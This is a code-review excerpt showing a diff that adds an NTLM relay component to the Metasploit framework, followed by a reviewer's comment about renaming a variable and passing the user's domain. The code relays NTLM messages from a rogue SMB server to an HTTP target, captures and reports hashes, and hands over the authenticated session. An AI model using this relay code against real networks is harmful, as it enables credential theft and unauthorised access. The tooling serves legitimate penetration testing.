lib/msf/core/exploit/remote/smb/server/http_relay.rb

```diff
@@ -0,0 +1,143 @@
+        }
+      }
+    )
+    res = http_client._send_recv(req, @http_timeout, true)
+    @ntlm_type1 = ntlm_type1
+    ntlm_type2_b64 = res.headers['WWW-Authenticate'].split[1]
+    ntlm_type2 = Net::NTLM::Message.decode64(ntlm_type2_b64)
+    @ntlm_type2 = ntlm_type2
+    vprint_status('Relaying NTLM Message 2 to SMB Target')
+    return @ntlm_type2
+  end
+
+  def relay_ntlm_type3(ntlm_type3)
+    vprint_status('Received NTLM Type 3 from SMB Client')
+
+    # required to call encode64 on ntlm message
+    ntlm_type3.domain = ntlm_type3.domain.force_encoding('ASCII-8BIT')
+    ntlm_type3.user = ntlm_type3.user.force_encoding('ASCII-8BIT')
+    ntlm_type3.workstation = ntlm_type3.workstation.force_encoding('ASCII-8BIT')
+    @ntlm_type3 = ntlm_type3
+    vprint_status('Relaying NTLM Type 3 to HTTP Target')
+    req = http_client.request_raw(
+      {
+        'method' => 'GET',
+        'uri' => @login_uri,
+        'headers' => {
+          'Accept-Encoding' => 'identity',
+          'Authorization' => 'NTLM ' + ntlm_type3.encode64
+        }
+      }
+    )
+    res = http_client._send_recv(req, @http_timeout, true)
+    return false unless res&.code == 404
+
+    vprint_status('Reporting hash')
+    report_ntlm_type3(
+      address: datastore['RHOST'],
+      ntlm_type1: @ntlm_type1,
+      ntlm_type2: @ntlm_type2,
+      ntlm_type3: @ntlm_type3
+    )
+    return true
+  end
+
+  class HTTPRelayNTLMProvider < ::RubySMB::Gss::Provider::NTLM
+    # @param [::WindowsError::NTStatus] ntlm_type3_status A specific NT Status to return as the response to the NTLM
+    #   type 3 message. If this value is nil, the message will be processed as normal.
+    def initialize(allow_anonymous: false, allow_guests: false, default_domain: 'WORKGROUP', listener: nil, ntlm_type3_status: ::WindowsError::NTStatus::STATUS_ACCESS_DENIED)
+      super(allow_anonymous: allow_anonymous, allow_guests: allow_guests, default_domain: default_domain)
+      @listener = listener
+      @ntlm_type3_status = ntlm_type3_status
+    end
+
+    # Needs overwritten to ensure our version of Authenticator is returned
+    def new_authenticator(server_client)
+      # build and return an instance that can process and track stateful information for a particular connection but
+      # that's backed by this particular provider
+      HTTPRelayAuthenticator.new(self, server_client)
+    end
+
+    attr_reader :listener
+    attr_accessor :ntlm_type3_status
+  end
+
+  class HTTPRelayAuthenticator < ::RubySMB::Gss::Provider::NTLM::Authenticator
+
+    def process_ntlm_type1(type1_msg)
+      @ntlm_type1 = type1_msg
+      @ntlm_type2 = @provider.listener.relay_ntlm_type1(type1_msg)
+      @ntlm_type2
+    end
+
+    def process_ntlm_type3(type3_msg)
+      @provider.listener.relay_ntlm_type3(type3_msg)
+      client_socket = @provider.listener.http_client
+      @provider.listener.post_login_action(client_socket: client_socket, authenticated_username: type3_msg.user.encode('UTF-8'))
```

Comment:
I'm sorry about all of the refactoring that's going to be required for this request, but client_socket isn't a socket object, it's a Rex::Proto::Http::Client instance which does not inherit from Rex::Socket so this should really be `http_client` that's passed around and not `client_socket`.

I think we also want to pass the domain that the user is authenticated to as well. Whether to join that with the `authenticated_username` to make it `DOMAIN\\user` or add an `authenticated_domain` is up to you but it's very relevant information that should be passed too.